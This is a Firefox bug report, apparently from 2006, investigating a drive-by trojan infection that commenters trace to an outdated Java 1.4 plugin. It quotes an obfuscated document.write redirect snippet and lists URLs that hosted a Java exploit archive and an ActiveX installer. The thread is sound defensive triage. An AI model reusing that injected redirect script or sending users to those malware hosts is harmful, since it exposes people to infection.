Closed Bug 337768 Opened 18 years ago Closed 18 years ago

Active exploit that installs trojan on ff 1.5.3

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: rene, Unassigned)

References

(
URL
)

Details

Attachments

(1 file)

about:plugins
24.20 KB, text/html
Details 
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3

Navigating to this URL with ff 1.5.3 will install one or multiple trojans, reason unknown but virusscanner alerts, placing arbitrary executables in \windows\system32 directory. It redirects the user before or afterwards.
Reproducable on my system.

Reproducible: Always

Steps to Reproduce:
1. navigate to http://c-erotica.cumswap.net/ with ff 1.5.3
2. watch your virusscanner detect trojans.
3.

Actual Results:  
AVG pops up offering to quarantaine the trojan.

Expected Results:  
-

Accidental discovery, reproducable.
page loads:  http://teenboat.sexy-teen-girls-free-porn-pics.biz/src.js
contains:
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61%76%61%73%63%72%69%70%74%27%3E%0D%0A%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%2D%6F%72%67%61%73%6D%2E%6F%72%67%2F%73%65%78%2E%68%74%6D%6C%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A'))
decodes as:
<script language='javascript'> window.location.href="http://www.e-orgasm.org/sex.html"; 
</script>


Agreed, trojan also installs when going to http://www.e-orgasm.org/sex.html

I've made a log with ethereal, not sure where to put it.
René, can you type about:plugins into the url bar, do File->Save Page As (Web Page Complete), then attach the page here? thanks.
Attached file about:plugins 
as requested
what are the name of the trojans?
windows defender didn't catch anything after loading http://www.e-orgasm.org/sex.html in the test I just ran.
According to the attachment in comment 4, you're using Java 1.4.1_03.  Bug 271559, filed in 2004, mentions active exploits against Java versions lower than 1.4.2_06.  I bet the site is exploiting a security hole in the old version of Java you have.

If you're feeling brave, want to disable/uninstall Java and try again, or update your Java VM and try again?
René, actually most of your plugins are out of date and have been superceded by later versions which incorporate fixes for security issues. Please update _all of your plugins_ as soon as possible, clean your system and try again.
Hi,

Well, i have 5 extensions installed (DOM Inspector, Talkback, Adblock, Stumbleupon, Live HTTP Headers). StumbleUpon was indeed out of date, i upgraded.

I checked system with hitman pro, AVG is running, system should be clean.

Trojan horse name (one of them) is Dropper.Small.8.BT according to AVG.

Actually, I meant plugins. Hopefully I am up to date. To compare yours with mine:

yours: QuickTime Plug-in 7.0.3
mine:  QuickTime Plug-in 7.0.4

yours: Real 6.0.12.1465
mine:  Real 6.0.12.1483

yours: Shockwave Flash 8.0 r22
mine:  Shockwave Flash 8.0 r24

yours: Java Plug-in 1.4.1_03
mine:  Java Plug-in 1.5.0_06



crap, QuickTime 7.0.4 is now out of date, get the latest 7.1 from <http://www.apple.com/support/downloads/>.
www.e-orgasm.org/sex.html loads attemps lots of crap, which is generally how these "free" sites pay for themselves. Are you confident you can stay ahead of the hackers? Note that Anti-Virus won't save you: they only detect the bad stuff they've already discovered, which by definition means there's a window of time when the bad guys start using a new trick and when the AV products start detecting it.

One thing it loads is detected as Trojan.ByteVerify (an old Java exploit, almost guaranteed to be present on these kinds of sites)
http://www.awmdabest.com/tjar/364/ns/archive.jar 

It also includes a script from http://install.xxxtoolbar.com/ that tries tons of tricks, mostly IE. Starting with a simple plea "Clean OK then Yes to Install" http://www.tbcode.com/ist/softwares/v4.0/0006_regular.cab -- no other reason given, just to see how gullible people are I guess.

xxxtoolbar.com has a flash movie called toolbarcash.swf with the associated text "For Easy Installation of SlotchBar". It scans clean, but I didn't run it to see what it tried to load into the associated iframe.

a couple more attempts run the tbcode.com active x from above.

Loads an adultfriendfinder.com frame which looked safe as far as I could tell. heh: "The individuals appearing in this advertisement may not be actual Adult FriendFinder members." I'm sure they're not.

This looks like the old Java exploit (which is a downloader, the actual payload differs from site to site). I'm slightly suspicious of the flash since that's going around too, but this particular one seemed to scan clean.
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Depends on: startpagewarning
Resolution: --- → INVALID
Disabling Java indeed stops the system from being infected. An outdated java probably is the vector.

Which makes me wondering.. I am one of the users that nicely applies when some software mention there is a new version, and have done so in the past several times for java.

But.. at this very moment, java (even when loaded with ff) does not mention an update, btw neither does flash or qt. I am not sure how this mechanism is supposed to work, (ie will the autoupdate only get triggered with ff running and having the plugin loaded?), and worse, i cannot find _any_ option to manually update java, since it is not in the start menu, the traybar icon that shows up after running some java app isn't of help either, ff menu does not show some plugin config or 'check for updates' (besides the extensions) so apparently i am dependent on the auto-update mechanism of the plugin author?...

So, what steps were actually expected from me, as user, to fix or prevent this, i am obviously missing something here. So far, my best solution is to just disable java.

An addition to this java thing, according to control panel/software J2SE RE 5.0 update 6 (1.5.0_06, right?) is nicely installed.

J2SE 1.4.1 seems _not_ installed, however that appears the version launched with ff. I have updated ff in the past, several times, so probably this java 1.4 just kept "sleeping"

I went to ff_install_dir\plugins\ and removed any dll that had to do with java. After ff restart, indeed now java 1.5 is launched (and the issue solved).

So after all, the issue appears to be: java 1.4 plugin hanging around with ff, even after uninstall(?), and getting launched by default even if java 1.5 is installed. Should i file a new bug report for that? ;)

Many thanks for the help from you guys, and i am glad it was not ff itself.
Looking at your plugin list it appears you have both Java 1.4.1_03 and Java 1.5.0_06 installed. I wonder if the Java 1.5.0 installer didn't clean out the old plugin version from Firefox's installation directory. That is not good.
Well, java 1.5.0_06 is not in the plugins directory, i looked for it and the dll's (same named as the 1.41 ones i dropped from plugin dir) are in "program files\java\jre1.5.0_06\bin".
Not sure how ff detects this, but i _think_ putting them in plugins dir was old method, looking into registry for java location is new method. And, (i think) plugins in ff plugin directory apparently get priority above java installation in other directory. My current system is about 10 months old, afaik it only ran ff 1.0 and up, not 0.9.
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: